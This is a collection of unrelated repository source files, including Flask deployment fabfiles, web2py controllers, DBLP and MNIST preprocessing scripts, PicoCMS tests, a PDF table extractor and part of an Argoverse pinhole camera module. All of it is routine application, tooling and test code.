arcade.open_window(1200, 600, "Lab 06 -- Loopy Lab")
arcade.set_background_color(arcade.color.AIR_FORCE_BLUE)
arcade.start_render()
#Draw the outlines for the sections
draw_section_outlines()
#Draw the sections
draw_section_1()
draw_section_2()
draw_section_3()
draw_section_4()
draw_section_5()
draw_section_6()
draw_section_7()
draw_section_8()
arcade.finish_render()
arcade.run()
if __name__=='__main__':
main()
``` |
{
"source": "johnwheeler/flask-live-starter",
"score": 2
} |
#### File: flask-live-starter/fabfile/install.py
```python
from fabric.api import task, sudo
from fabric.contrib.files import sed
from fabric.context_managers import cd
from .constants import *
__all__ = ['system', 'postgres', 'redis']
@task
def system():
_system_update_upgrade()
# unattended upgrades
_install('needrestart')
_install('unattended-upgrades')
sudo('cp /usr/share/unattended-upgrades/20auto-upgrades /etc/apt/apt.conf.d/20auto-upgrades')
# python related
_install('libffi-dev')
_install('libssl-dev')
_install('python-dev')
_install('python-pip')
_install('python-virtualenv')
# wsgi
_install('gunicorn')
# httpd
_install('nginx')
# firewall
_install('ufw')
# letsencrypt
_install('python-certbot-nginx -t jessie-backports')
@task
def postgres():
# add postgres repository to apt
sudo("sh -c 'echo deb http://apt.postgresql.org/pub/repos/apt/ jessie-pgdg main > /etc/apt/sources.list.d/pgdg.list'")
sudo('wget --quiet -O - https://www.postgresql.org/media/keys/ACCC4CF8.asc | apt-key add -')
sudo('apt-get update')
# install postgresql components
pg_version = '9.6'
_install('postgresql-{}'.format(pg_version))
_install('postgresql-client-{}'.format(pg_version))
_install('postgresql-server-dev-{}'.format(pg_version))
_install('postgresql-contrib-{}'.format(pg_version))
@task
def redis():
# make required directories
sudo('mkdir /etc/redis')
sudo('mkdir /var/redis')
sudo('mkdir /var/redis/6379')
# download
sudo('wget http://download.redis.io/redis-stable.tar.gz')
# untar
sudo('tar xzf redis-stable.tar.gz')
with cd('redis-stable'):
# make & make install
sudo('make')
sudo('make install')
# copy system init script
sudo('cp utils/redis_init_script /etc/init.d/redis_6379')
# copy redis configuration file
sudo('cp redis.conf /etc/redis/6379.conf')
# edit the configuration file
sed('/etc/redis/6379.conf', '^daemonize no$', 'daemonize yes', use_sudo=True)
sed('/etc/redis/6379.conf', '^logfile ""$',
'logfile /var/log/redis_6379.log', use_sudo=True)
sed('/etc/redis/6379.conf', '^dir ./$',
'dir /var/redis/6379', use_sudo=True)
# update script init links
sudo('update-rc.d redis_6379 defaults')
# start redis system service
sudo('service redis_6379 start')
# clean up
sudo('rm -rf redis-stable')
sudo('rm redis-stable.tar.gz')
def _system_update_upgrade():
# backports
sudo("sh -c 'echo deb http://ftp.us.debian.org/debian/ jessie-backports main >> /etc/apt/sources.list'")
# update
sudo('apt-get update')
# upgrade
sudo('apt-get upgrade -y')
def _install(pkg):
sudo('DEBIAN_FRONTEND=noninteractive apt-get install {} -y'.format(pkg))
```
#### File: flask-live-starter/fabfile/provision.py
```python
from fabric.api import task, sudo
from .constants import *
__all__ = ['certificate', 'firewall', 'database']
@task
def certificate():
sudo('certbot --nginx --non-interactive --agree-tos --redirect --domain {} --domain {}.{} --email {}'
.format(DOMAIN, SUBDOMAIN, DOMAIN, EMAIL))
@task
def firewall():
# allow http
sudo('ufw allow 80/tcp')
# allow https
sudo('ufw allow 443/tcp')
# allow ssh
sudo('ufw allow 22/tcp')
# enable firewall
sudo('ufw --force enable')
@task
def database():
sudo('createuser {} -P'.format(APP_NAME), user='postgres')
sudo('createdb {} -O {}'.format(APP_NAME, APP_NAME), user='postgres')
```
#### File: flask-live-starter/fabfile/remote.py
```python
import os
from datetime import datetime
from fabric.api import task, local, sudo, put
from fabric.contrib import files
from jinja2 import Environment, FileSystemLoader
from .constants import *
__all__ = ['deploy', 'undeploy', 'backup', 'tail', 'reset_log']
@task
def tail(grep=""):
sudo("tail -F -n +1 {} | grep --line-buffered -i '{}'"
.format(REMOTE_LOG_FILE, grep))
@task
def reset_log():
sudo("rm -f {}".format(REMOTE_LOG_FILE))
sudo("service gunicorn reload")
@task
def deploy():
_upload_archive()
_extract_archive()
_update_py_deps()
_ensure_log_dir()
_configure_gunicorn()
_configure_nginx()
@task
def undeploy():
sudo('rm -rf {}'.format(REMOTE_DEPLOY_DIR))
if files.exists(REMOTE_GUNICORN_CONF_FILE):
sudo('rm {}'.format(REMOTE_GUNICORN_CONF_FILE))
sudo("service gunicorn restart")
if files.exists(REMOTE_NGINX_CONF_FILE):
sudo('rm {}'.format(REMOTE_NGINX_CONF_FILE))
sudo('service nginx restart')
@task
def backup():
timestamp = datetime.now().strftime('%Y-%m-%d_%H%M')
dump_file = '%s-remote-%s.dmp' % (APP_NAME, timestamp)
pg_dump_cmd = 'pg_dump {} -U {} -h localhost -x -Fc -f {}' \
.format(APP_NAME, APP_NAME, dump_file)
sudo(pg_dump_cmd)
if not os.path.exists(LOCAL_BACKUPS_DIR):
local('mkdir {}'.format(LOCAL_BACKUPS_DIR))
files.get(dump_file, LOCAL_BACKUPS_DIR)
sudo("rm %s" % dump_file)
def _upload_archive():
outdir = 'dist/{}'.format(APP_NAME)
local('mkdir -p {}'.format(outdir))
local('cp requirements.txt {}'.format(outdir))
local('cp -R {} {}'.format(APP_NAME, outdir))
local('find {} -name "*.pyc" -type f -delete'.format(outdir))
local('tar czf {} {}'.format(LOCAL_ARCHIVE, outdir))
put(LOCAL_ARCHIVE, REMOTE_ARCHIVE, use_sudo=True)
local('rm -rf dist')
def _extract_archive():
if not files.exists(REMOTE_DEPLOY_DIR, use_sudo=True):
sudo('mkdir {}'.format(REMOTE_DEPLOY_DIR))
sudo('chown -R www-data:www-data {}'.format(REMOTE_DEPLOY_DIR))
sudo('chmod -R og-rwx,g+rxs {}'.format(REMOTE_DEPLOY_DIR))
sudo('rm -rf {}'.format(REMOTE_APP_DIR))
sudo('tar xmzf {} -C {} --strip-components=2'.format(REMOTE_ARCHIVE, REMOTE_DEPLOY_DIR))
sudo('rm {}'.format(REMOTE_ARCHIVE))
def _update_py_deps():
if not files.exists(REMOTE_VENV, use_sudo=True):
sudo('virtualenv {}'.format(REMOTE_VENV))
sudo('{}/bin/pip install -r {}/requirements.txt'.format(REMOTE_VENV, REMOTE_DEPLOY_DIR))
def _ensure_log_dir():
if not files.exists(REMOTE_LOG_DIR):
sudo('mkdir {}'.format(REMOTE_LOG_DIR))
sudo('chown -R www-data:www-data {}'.format(REMOTE_LOG_DIR))
sudo('chmod -R og-rwx,g+rxs {}'.format(REMOTE_LOG_DIR))
def _configure_gunicorn():
if not files.exists(REMOTE_GUNICORN_CONF_FILE):
files.upload_template(LOCAL_GUNICORN_CONF_FILE,
REMOTE_GUNICORN_CONF_FILE,
context={'app_name': APP_NAME},
template_dir=LOCAL_ETC_DIR,
use_jinja=True,
use_sudo=True)
sudo("service gunicorn restart")
def _configure_nginx():
if not files.exists(REMOTE_NGINX_CONF_FILE):
files.upload_template(LOCAL_NGINX_CONF_FILE,
REMOTE_NGINX_CONF_FILE,
context={
'app_name': APP_NAME,
'domain': DOMAIN,
'subdomain': SUBDOMAIN
},
template_dir=LOCAL_ETC_DIR,
use_jinja=True,
use_sudo=True)
sudo('service nginx reload')
``` |
{
"source": "johnwheffner/acacrits",
"score": 2
} |
#### File: acacrits/controllers/athlete.py
```python
def index():
response.title = "Athletes"
grid = SQLFORM.grid(db.athlete, editable=True, user_signature=False)
return locals()
```
#### File: acacrits/controllers/marshal.py
```python
def index():
response.title = "Marshals"
grid = SQLFORM.grid(db.marshal, editable=True, user_signature=False)
return locals()
```
#### File: acacrits/controllers/team.py
```python
def index():
response.title = "Teams"
grid = SQLFORM.grid(db.team, editable=True, user_signature=False)
return locals()
``` |
{
"source": "johnwickerson/dblp-playground",
"score": 2
} |
#### File: johnwickerson/dblp-playground/dblp-xml-to-tsv.py
```python
import xml.sax
import codecs
import sys
xml_path = sys.argv[1]
tl = ['article', 'inproceedings', 'proceedings', 'book', 'incollection', 'phdthesis', 'mastersthesis', 'www']
at = ['title', 'booktitle', 'pages', 'year', 'address', 'journal', 'volume', 'number', 'month', 'url', 'ee', 'cdrom', 'cite', 'publisher', 'note', 'crossref', 'isbn', 'series', 'school', 'chapter']
sl = ['mdate', 'publtype', 'reviewid', 'rating', 'key']
pages = ['begin', 'end', 'numpages']
csvfields = ['etype'] + at + sl + pages
csvlengths = {}
for f in csvfields:
csvlengths[f] = 0
for f in tl:
csvlengths[f] = 0
csvlengths['author'] = 0
csvlengths['editor'] = 0
writtenBy = codecs.open("writtenBy.tsv", "w", "utf-8")
papers = codecs.open("papers.tsv", "w", "utf-8")
authors = codecs.open("authors.tsv", "w", "utf-8")
editedBy = codecs.open("editedBy.tsv", "w", "utf-8")
lengths = codecs.open("lengths.tsv", "w", "utf-8")
authorFirstNameLength = 0
authorLastNameLength = 0
class DBLPXMLHANDLER(xml.sax.ContentHandler):
cfields = {}
distAuthors = {}
cval = ""
paperCounter = 0
authorCounter = 0
authorID = 0
def startElement(self, name, attrs):
if name in tl:
self.cfields.clear()
self.cval = ""
self.cfields['anum'] = 1
self.cfields['etype'] = name
for s in tl:
self.cfields[s] = '\N'
for s in at:
self.cfields[s] = '\N'
for s in sl:
self.cfields[s] = '\N'
for s in pages:
self.cfields[s] = '\N'
for (k, v) in attrs.items():
self.cfields[k] = v
if name in ['author'] + csvfields:
self.cval = ""
if name in ['editor'] + csvfields:
self.cval = ""
def characters(self, content):
self.cval = self.cval + content
def endElement(self, name):
if name in (tl + csvfields) and not self.cval.isdigit() and csvlengths[name] < len(self.cval):
csvlengths[name] = len(self.cval)
#editors and authors share the same tsv, but not the same writtenBy/ editedBy
if name == 'author' or name == 'editor':
global authorFirstNameLength
global authorLastNameLength
if self.cval in self.distAuthors:
authorID = self.distAuthors[self.cval]
else:
self.distAuthors[self.cval] = self.authorCounter;
authorID = self.authorCounter;
self.authorCounter += 1
authorName = self.cval.split()
authorFirstName =""
for x in xrange(len(authorName) - 1):
authorFirstName += authorName[x]
if x<(len(authorName)-1):
authorFirstName += " "
authorLastName = authorName[len(authorName) - 1]
            if authorFirstName == "":
authorFirstName = "\N"
if len(authorFirstName) > authorFirstNameLength:
authorFirstNameLength = len(authorFirstName)
if len(authorLastName) > authorLastNameLength:
authorLastNameLength = len(authorLastName)
authors.write(str(authorID) + "\t" + self.cval + "\t" + authorFirstName + "\t" + authorLastName + "\n")
if name == 'author':
writtenBy.write(str(self.paperCounter) + "\t" + str(authorID) + "\t" + str(self.cfields['anum']).encode("utf-8").decode("utf-8") + "\n")
self.cfields['anum'] = self.cfields['anum'] + 1
else: #name == 'editor'
editedBy.write(str(self.paperCounter) + "\t" + str(authorID) + "\t" + str(self.cfields['anum']).encode("utf-8").decode("utf-8") + "\n")
self.cfields['anum'] = self.cfields['anum'] + 1
if name in at:
if name == 'pages':
pageArray = self.cval.split('-')
if len(pageArray) == 2:
pageFromArray = pageArray[0].split(':')
pageFrom = pageFromArray[len(pageFromArray) - 1]
pageToArray = pageArray[1].split(':')
pageTo = pageToArray[len(pageToArray) - 1]
if pageFrom.isdigit() and pageTo.isdigit():
self.cfields['begin'] = pageFrom
self.cfields['end'] = pageTo
self.cfields[name] = self.cval
if name in tl:
line = []
for f in csvfields:
line.append(self.cfields.get(f, ''))
papers.write('\t'.join(line))
papers.write('\t' + str(self.paperCounter))
self.paperCounter = self.paperCounter + 1
papers.write('\n')
parser = xml.sax.make_parser()
parser.setContentHandler(DBLPXMLHANDLER())
parser.parse(open(xml_path, "r"))
for key in csvlengths:
lengths.write(key + "\t" + str(csvlengths.get(key, '')) + "\n")
lengths.write("FirstName\t" + str(authorFirstNameLength) + "\n")
lengths.write("LastName\t" + str(authorLastNameLength) + "\n")
papers.close()
authors.close()
writtenBy.close()
editedBy.close()
lengths.close()
``` |
{
"source": "johnwikman/miking-ml",
"score": 3
} |
#### File: miking-ml/preprocessing/mnist-binary-preprocess.py
```python
import struct
import sys
def uint32_from_be(bs):
assert len(bs) == 4
return struct.unpack(">I", bs)[0]
if len(sys.argv) != 4:
    print(f"usage: {sys.argv[0]} <binary data file> <binary label file> <target ASCII file>")
    sys.exit(1)
bin_datafile = sys.argv[1]
bin_labelfile = sys.argv[2]
outfile = sys.argv[3]
datapoints = []
print(f"reading images from {bin_datafile}...")
with open(bin_datafile, "rb") as f:
bs = f.read()
magic_number = uint32_from_be(bs[0:4])
assert magic_number == 2051, f"Invalid magic number {magic_number}, expected 2051"
n_images = uint32_from_be(bs[4:8])
rows = uint32_from_be(bs[8:12])
cols = uint32_from_be(bs[12:16])
assert rows == 28, f"Expected number of rows to be 28, got {rows}"
assert cols == 28, f"Expected number of cols to be 28, got {cols}"
expected_bytes = 16 + (rows * cols * n_images)
assert expected_bytes == len(bs), f"Expected number of bytes to be {expected_bytes}, got {len(bs)}"
for i in range(n_images):
start = 16 + (i * rows * cols)
end = 16 + ((i + 1) * rows * cols)
datapoints.append((None, bs[start:end]))
print(f"reading labels from {bin_labelfile}...")
with open(bin_labelfile, "rb") as f:
bs = f.read()
magic_number = uint32_from_be(bs[0:4])
assert magic_number == 2049, f"Invalid magic number {magic_number}, expected 2049"
n_labels = uint32_from_be(bs[4:8])
assert n_labels == len(datapoints), f"Expected number of labels to be {len(datapoints)}, got {n_labels}"
expected_bytes = 8 + n_labels
assert expected_bytes == len(bs), f"Expected number of bytes to be {expected_bytes}, got {len(bs)}"
for i in range(n_labels):
_, data = datapoints[i]
datapoints[i] = (int(bs[8+i]), data)
print(f"writing to {outfile}...")
# Outfile format is the bytes written in decimal, with LF separating datapoints
with open(outfile, "w+") as f:
for (cls, data) in datapoints:
f.write(f"{cls}")
for d in data:
f.write(f" {d}")
f.write("\n")
print("done.")
``` |
{
"source": "johnwilson/picocms",
"score": 2
} |
#### File: picocms/tests/test_picocms.py
```python
import unittest
import os
import shutil
import json
from flask import Flask
from flask_picocms import CMS
basedir = os.path.abspath(os.path.dirname(__file__))
class RepositoryCreationTestCase(unittest.TestCase):
def setUp(self):
self.dbname = "picocms-test.sqlite"
app = Flask(__name__)
app.config["PICOCMS_DATABASE"] = os.path.join(basedir, self.dbname)
app.config["PICOCMS_SOURCE_PAGES"] = os.path.join(basedir, "sample", "pages")
app.config["PICOCMS_SOURCE_DATA"] = os.path.join(basedir, "sample", "data")
pico = CMS(app)
self.app = app
self.pico = pico
self.pico.rebuild()
def tearDown(self):
self.pico.teardown(None)
if os.path.exists(self.app.config["PICOCMS_DATABASE"]):
os.remove(self.app.config["PICOCMS_DATABASE"])
def test_db_creation(self):
self.assertTrue(os.path.exists(self.app.config["PICOCMS_DATABASE"]))
def test_page_creation(self):
self.assertEqual(self.pico.content_count, 3)
def test_data_creation(self):
self.assertEqual(self.pico.data_count, 1)
def test_page_content(self):
page = self.pico.get_content("/index")
self.assertTrue(page.meta["draft"])
self.assertEqual(page.meta["name"], "index")
def test_doc_content(self):
doc = self.pico.get_data("/site")
self.assertEqual(doc.meta["name"], "site")
self.assertEqual(doc.json["name"], "PicoCMS")
def test_page_list(self):
res = self.pico.list_content("/news")
self.assertEqual(len(res), 2)
self.assertEqual(res[0]["title"], "news item 2")
``` |
{
"source": "johnwingit/gzJinHong",
"score": 3
} |
#### File: gzJinHong/tests/getLineTable.py
```python
import fitz
from Jinhong_tools import *
def isdigit(x):
try:
x=int(x)
return isinstance(x,int)
except ValueError:
return False
# to load database
# it is the text extracted from the pdf file
filepath = "../database/Db.txt"
jinl = Jinhong_tools(filepath)
DBltable = jinl.loadlinetableDB()
print(DBltable)
dictDB_ltableNO = jinl.loadlinetableNODB()
print(dictDB_ltableNO)
# To find the exact position of String
doc = fitz.open("../pdffile/YT4856.pdf")
page = doc[0]
# Open a data txt file.
fileForR = open("../pdffile/data.txt", "r")
fileForW = open("../LineTable/ReadLineTable06.txt", "w")
fileForW.write("%6s, %6s, %s, %s , %s \n" % ("x坐标", "y坐标", "材料型号编号","本公司编号","材料名称"))
line = fileForR.readline() # 调用文件的 readline()方法
while line:
# 后面跟 ',' 将忽略换行符
count =0
text =""
for ch in line:
if isdigit(ch):
text = text + ch
#print(ch)
count=count+1
else:
break
if count> 7:
print(line)
print(text)
lineno=text.strip()
text_instances = page.searchFor(text)
#print(text_instances)
x=text_instances[0][0]
y=text_instances[0][1]
s4 = dictDB_ltableNO[lineno]
s5= DBltable[lineno]
print(s4+s5)
fileForW.write("%6d, %6d, %s,%s,%s \n" % (x, y, lineno, s4, s5))
line = fileForR.readline()
fileForW.close()
fileForR.close()
``` |
{
"source": "johnwlambert/argoverse2-api",
"score": 3
} |
#### File: geometry/camera/pinhole_camera.py
```python
from __future__ import annotations
from dataclasses import dataclass
from functools import cached_property
from pathlib import Path
from typing import Tuple, Union
import numpy as np
import av2.geometry.geometry as geometry_utils
import av2.utils.io as io_utils
from av2.geometry.se3 import SE3
from av2.utils.typing import NDArrayBool, NDArrayFloat, NDArrayInt
@dataclass(frozen=True)
class Intrinsics:
"""Models a camera intrinsic matrix.
Args:
fx_px: Horizontal focal length in pixels.
fy_px: Vertical focal length in pixels.
cx_px: Horizontal focal center in pixels.
cy_px: Vertical focal center in pixels.
width_px: Width of image in pixels.
height_px: Height of image in pixels.
"""
fx_px: float
fy_px: float
cx_px: float
cy_px: float
width_px: int
height_px: int
@cached_property
def K(self) -> NDArrayFloat:
"""Camera intrinsic matrix."""
K: NDArrayFloat = np.eye(3, dtype=float)
K[0, 0] = self.fx_px
K[1, 1] = self.fy_px
K[0, 2] = self.cx_px
K[1, 2] = self.cy_px
return K
@dataclass(frozen=True)
class PinholeCamera:
"""Parameterizes a pinhole camera with zero skew.
Args:
ego_SE3_cam: pose of camera in the egovehicle frame (inverse of extrinsics matrix).
intrinsics: `Intrinsics` object containing intrinsic parameters and image dimensions.
cam_name: sensor name that camera parameters correspond to.
"""
ego_SE3_cam: SE3
intrinsics: Intrinsics
cam_name: str
@property
def width_px(self) -> int:
"""Return the width of the image in pixels."""
return self.intrinsics.width_px
@property
def height_px(self) -> int:
"""Return the height of the image in pixels."""
return self.intrinsics.height_px
@cached_property
def extrinsics(self) -> NDArrayFloat:
"""Return the camera extrinsics."""
return self.ego_SE3_cam.inverse().transform_matrix
@classmethod
def from_feather(cls, log_dir: Path, cam_name: str) -> PinholeCamera:
"""Create a pinhole camera model from a feather file.
Note: Data is laid out with sensor names along row dimension, and columns are sensor attribute data.
Args:
log_dir: path to a log directory containing feather files w/ calibration info.
cam_name: name of the camera.
Returns:
A new PinholeCamera object, containing camera extrinsics and intrinsics.
"""
intrinsics_path = log_dir / "calibration" / "intrinsics.feather"
intrinsics_df = io_utils.read_feather(intrinsics_path).set_index("sensor_name")
params = intrinsics_df.loc[cam_name]
intrinsics = Intrinsics(
fx_px=params["fx_px"],
fy_px=params["fy_px"],
cx_px=params["cx_px"],
cy_px=params["cy_px"],
width_px=int(params["width_px"]),
height_px=int(params["height_px"]),
)
sensor_name_to_pose = io_utils.read_ego_SE3_sensor(log_dir)
return cls(
ego_SE3_cam=sensor_name_to_pose[cam_name],
intrinsics=intrinsics,
cam_name=cam_name,
)
def cull_to_view_frustum(self, uv: NDArrayFloat, points_cam: NDArrayFloat) -> NDArrayBool:
"""Cull 3d points to camera view frustum.
Given a set of coordinates in the image plane and corresponding points
in the camera coordinate reference frame, determine those points
that have a valid projection into the image. 3d points with valid
projections have x coordinates in the range [0,width_px-1], y-coordinates
in the range [0,height_px-1], and a positive z-coordinate (lying in
front of the camera frustum).
Ref: https://en.wikipedia.org/wiki/Hidden-surface_determination#Viewing-frustum_culling
Args:
uv: Numpy array of shape (N,2) representing image plane coordinates in [0,W-1] x [0,H-1]
where (H,W) are the image height and width.
points_cam: Numpy array of shape (N,3) representing corresponding 3d points in the camera coordinate frame.
Returns:
Numpy boolean array of shape (N,) indicating which points fall within the camera view frustum.
"""
is_valid_x = np.logical_and(0 <= uv[:, 0], uv[:, 0] < self.width_px - 1)
is_valid_y = np.logical_and(0 <= uv[:, 1], uv[:, 1] < self.height_px - 1)
is_valid_z = points_cam[:, 2] > 0
is_valid_points: NDArrayBool = np.logical_and.reduce([is_valid_x, is_valid_y, is_valid_z])
return is_valid_points
def project_ego_to_img(
self, points_ego: NDArrayFloat, remove_nan: bool = False
) -> Tuple[NDArrayFloat, NDArrayFloat, NDArrayBool]:
"""Project a collection of 3d points (provided in the egovehicle frame) to the image plane.
Args:
points_ego: numpy array of shape (N,3) representing points in the egovehicle frame.
remove_nan: whether to remove coordinates that project to invalid (NaN) values.
Returns:
uv: image plane coordinates, as Numpy array of shape (N,2).
            points_cam: camera frame coordinates, as Numpy array of shape (N,3).
is_valid_points: boolean indicator of valid cheirality and within image boundary, as
boolean Numpy array of shape (N,).
"""
# convert cartesian to homogeneous coordinates.
points_ego_hom = geometry_utils.cart_to_hom(points_ego)
points_cam: NDArrayFloat = self.extrinsics @ points_ego_hom.T
# remove bottom row of all 1s.
uv = self.intrinsics.K @ points_cam[:3, :]
uv = uv.T
points_cam = points_cam.T
if remove_nan:
uv, points_cam = remove_nan_values(uv, points_cam)
uv = uv[:, :2] / uv[:, 2].reshape(-1, 1)
is_valid_points = self.cull_to_view_frustum(uv, points_cam)
return uv, points_cam, is_valid_points
def project_cam_to_img(
self, points_cam: NDArrayFloat, remove_nan: bool = False
) -> Tuple[NDArrayFloat, NDArrayFloat, NDArrayBool]:
"""Project a collection of 3d points in the camera reference frame to the image plane.
Args:
            points_cam: numpy array of shape (N,3) representing points in the camera frame.
remove_nan: whether to remove coordinates that project to invalid (NaN) values.
Returns:
uv: image plane coordinates, as Numpy array of shape (N,2).
            points_cam: camera frame coordinates, as Numpy array of shape (N,3).
is_valid_points: boolean indicator of valid cheirality and within image boundary, as
boolean Numpy array of shape (N,).
"""
uv = self.intrinsics.K @ points_cam[:3, :]
uv = uv.T
points_cam = points_cam.T
if remove_nan:
uv, points_cam = remove_nan_values(uv, points_cam)
uv = uv[:, :2] / uv[:, 2].reshape(-1, 1)
is_valid_points = self.cull_to_view_frustum(uv, points_cam)
return uv, points_cam, is_valid_points
def project_ego_to_img_motion_compensated(
self,
points_lidar_time: NDArrayFloat,
city_SE3_ego_cam_t: SE3,
city_SE3_ego_lidar_t: SE3,
) -> Tuple[NDArrayFloat, NDArrayFloat, NDArrayBool]:
"""Project points in the ego frame to the image with motion compensation.
Because of the high frame rate, motion compensation's role between the
sensors is not very significant, moving points only by millimeters
to centimeters. If the vehicle is moving at 25 miles per hour, equivalent
to 11 meters/sec, then in 17 milliseconds (the max time between a lidar sweep
and camera image capture) we should be able to move up to 187 millimeters.
This can be verified in practice as the mean_change:
mean_change = np.amax(points_h_cam_time.T[:,:3] - points_h_lidar_time ,axis=0)
Adjust LiDAR points for egovehicle motion. This function accepts the
egovehicle's pose in the city map both at camera time and also at
the LiDAR time.
We perform the following transformation:
pt_egovehicle_cam_t = egovehicle_cam_t_SE3_city * city_SE3_egovehicle_lidar_t * pt_egovehicle_lidar_t
Note that both "cam_time_points_h" and "lidar_time_points_h" are 3D points in the
vehicle coordinate frame, but captured at different times. These LiDAR points
always live in the vehicle frame, but just in different timestamps. If we take
a lidar point in the egovehicle frame, captured at lidar time, and bring it into
the map at this lidar timestamp, then we know the transformation from map to
egovehicle reference frame at the time when the camera image was captured.
Thus, we move from egovehicle @ lidar time, to the map (which is time agnostic),
then we move from map to egovehicle @ camera time. Now we suddenly have lidar points
living in the egovehicle frame @ camera time.
Args:
points_lidar_time: Numpy array of shape (N,3)
city_SE3_ego_cam_t: egovehicle pose when camera image was recorded.
city_SE3_ego_lidar_t: egovehicle pose when LiDAR sweep was recorded.
Returns:
uv: image plane coordinates, as Numpy array of shape (N,2).
points_cam: Numpy array of shape (N,3) representing coordinates of points within the camera frame.
is_valid_points_cam: boolean indicator of valid cheirality and within image boundary, as
boolean Numpy array of shape (N,).
Raises:
ValueError: If `city_SE3_ego_cam_t` or `city_SE3_ego_lidar_t` is `None`.
"""
if city_SE3_ego_cam_t is None:
raise ValueError("city_SE3_ego_cam_t cannot be `None`!")
if city_SE3_ego_lidar_t is None:
raise ValueError("city_SE3_ego_lidar_t cannot be `None`!")
ego_cam_t_SE3_ego_lidar_t = city_SE3_ego_cam_t.inverse().compose(city_SE3_ego_lidar_t)
points_cam_time = ego_cam_t_SE3_ego_lidar_t.transform_point_cloud(points_lidar_time)
return self.project_ego_to_img(points_cam_time)
@cached_property
def right_clipping_plane(self) -> NDArrayFloat:
"""Form the right clipping plane for a camera view frustum.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = -self.intrinsics.fx_px, 0.0, self.width_px / 2.0, 0.0
coeffs: NDArrayFloat = np.array([a, b, c, d]) / np.linalg.norm([a, b, c]) # type: ignore
return coeffs
@cached_property
def left_clipping_plane(self) -> NDArrayFloat:
"""Form the left clipping plane for a camera view frustum.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = self.intrinsics.fx_px, 0.0, self.width_px / 2.0, 0.0
coeffs: NDArrayFloat = np.array([a, b, c, d]) / np.linalg.norm([a, b, c]) # type: ignore
return coeffs
@cached_property
def top_clipping_plane(self) -> NDArrayFloat:
"""Top clipping plane for a camera view frustum.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = 0.0, self.intrinsics.fx_px, self.height_px / 2.0, 0.0
coeffs: NDArrayFloat = np.array([a, b, c, d]) / np.linalg.norm([a, b, c]) # type: ignore
return coeffs
@cached_property
def bottom_clipping_plane(self) -> NDArrayFloat:
"""Bottom clipping plane for a camera view frustum.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = 0.0, -self.intrinsics.fx_px, self.height_px / 2.0, 0.0
coeffs: NDArrayFloat = np.array([a, b, c, d]) / np.linalg.norm([a, b, c]) # type: ignore
return coeffs
def near_clipping_plane(self, near_clip_m: float) -> NDArrayFloat:
"""Near clipping plane for a camera view frustum.
Args:
near_clip_m: Near clipping plane distance in meters.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = 0.0, 0.0, 1.0, -near_clip_m
coeffs: NDArrayFloat = np.array([a, b, c, d])
return coeffs
def frustum_planes(self, near_clip_dist: float = 0.5) -> NDArrayFloat:
"""Compute the planes enclosing the field of view (view frustum).
Reference (1): https://en.wikipedia.org/wiki/Viewing_frustum
Reference (2): https://en.wikipedia.org/wiki/Plane_(geometry)
Solve for the coefficients of all frustum planes:
ax + by + cz = d
Args:
near_clip_dist: Distance of the near clipping plane from the origin.
Returns:
(5, 4) matrix where each row corresponds to the coeffients of a plane.
"""
left_plane = self.left_clipping_plane
right_plane = self.right_clipping_plane
top_plane = self.top_clipping_plane
bottom_plane = self.bottom_clipping_plane
near_plane = self.near_clipping_plane(near_clip_dist)
planes: NDArrayFloat = np.stack([left_plane, right_plane, near_plane, bottom_plane, top_plane])
return planes
@cached_property
def egovehicle_yaw_cam_rad(self) -> float:
"""Compute the camera's yaw, in the egovehicle frame.
R takes the x axis to be a vector equivalent to the first column of R.
Similarly, the y and z axes are transformed to be the second and third columns.
Returns:
Counter-clockwise angle from x=0 (in radians) of camera center ray, in the egovehicle frame.
"""
egovehicle_SE3_camera = self.ego_SE3_cam
# the third column of this rotation matrix, is the new basis vector for the z axis (pointing out of camera)
# take its x and y components (the z component is near zero, as close to horizontal)
new_z_axis = egovehicle_SE3_camera.rotation[:, 2]
dx, dy, dz = new_z_axis
egovehicle_yaw_cam_rad = np.arctan2(dy, dx)
return float(egovehicle_yaw_cam_rad)
@cached_property
def fov_theta_rad(self) -> float:
"""Compute the field of view of a camera frustum to use for view frustum culling during rendering.
Returns:
Angular extent of camera's field of view (measured in radians).
"""
fov_theta_rad = 2 * np.arctan(0.5 * self.width_px / self.intrinsics.fx_px)
return float(fov_theta_rad)
def compute_pixel_ray_directions(self, uv: Union[NDArrayFloat, NDArrayInt]) -> NDArrayFloat:
"""Given (u,v) coordinates and intrinsics, generate pixel rays in the camera coordinate frame.
Assume +z points out of the camera, +y is downwards, and +x is across the imager.
Args:
uv: Numpy array of shape (N,2) with (u,v) coordinates
Returns:
Array of shape (N,3) with ray directions to each pixel, provided in the camera frame.
Raises:
ValueError: If input (u,v) coordinates are not (N,2) in shape.
RuntimeError: If generated ray directions are not (N,3) in shape.
"""
fx, fy = self.intrinsics.fx_px, self.intrinsics.fy_px
img_h, img_w = self.height_px, self.width_px
if not np.isclose(fx, fy, atol=1e-3):
raise ValueError(f"Focal lengths in the x and y directions must match: {fx} != {fy}")
if uv.shape[1] != 2:
raise ValueError("Input (u,v) coordinates must be (N,2) in shape.")
# Approximation for principal point
px = img_w / 2
py = img_h / 2
u = uv[:, 0]
v = uv[:, 1]
num_rays = uv.shape[0]
ray_dirs = np.zeros((num_rays, 3))
# x center offset from center
ray_dirs[:, 0] = u - px
# y center offset from center
ray_dirs[:, 1] = v - py
ray_dirs[:, 2] = fx
# elementwise multiplication of scalars requires last dim to match
ray_dirs = ray_dirs / np.linalg.norm(ray_dirs, axis=1, keepdims=True) # type: ignore
if ray_dirs.shape[1] != 3:
raise RuntimeError("Ray directions must be (N,3)")
return ray_dirs
def remove_nan_values(uv: NDArrayFloat, points_cam: NDArrayFloat) -> Tuple[NDArrayFloat, NDArrayFloat]:
"""Remove NaN values from camera coordinates and image plane coordinates (accepts corrupt array).
Args:
uv: image plane coordinates, as Numpy array of shape (N,2).
points_cam: Numpy array of shape (N,3) representing coordinates of points within the camera frame.
Returns:
uv_valid: subset of image plane coordinates, which contain no NaN coordinates.
is_valid_points_cam: subset of 3d points within the camera frame, which contain no NaN coordinates.
"""
is_u_valid = np.logical_not(np.isnan(uv[:, 0]))
is_v_valid = np.logical_not(np.isnan(uv[:, 1]))
is_uv_valid = np.logical_and(is_u_valid, is_v_valid)
uv_valid = uv[is_uv_valid]
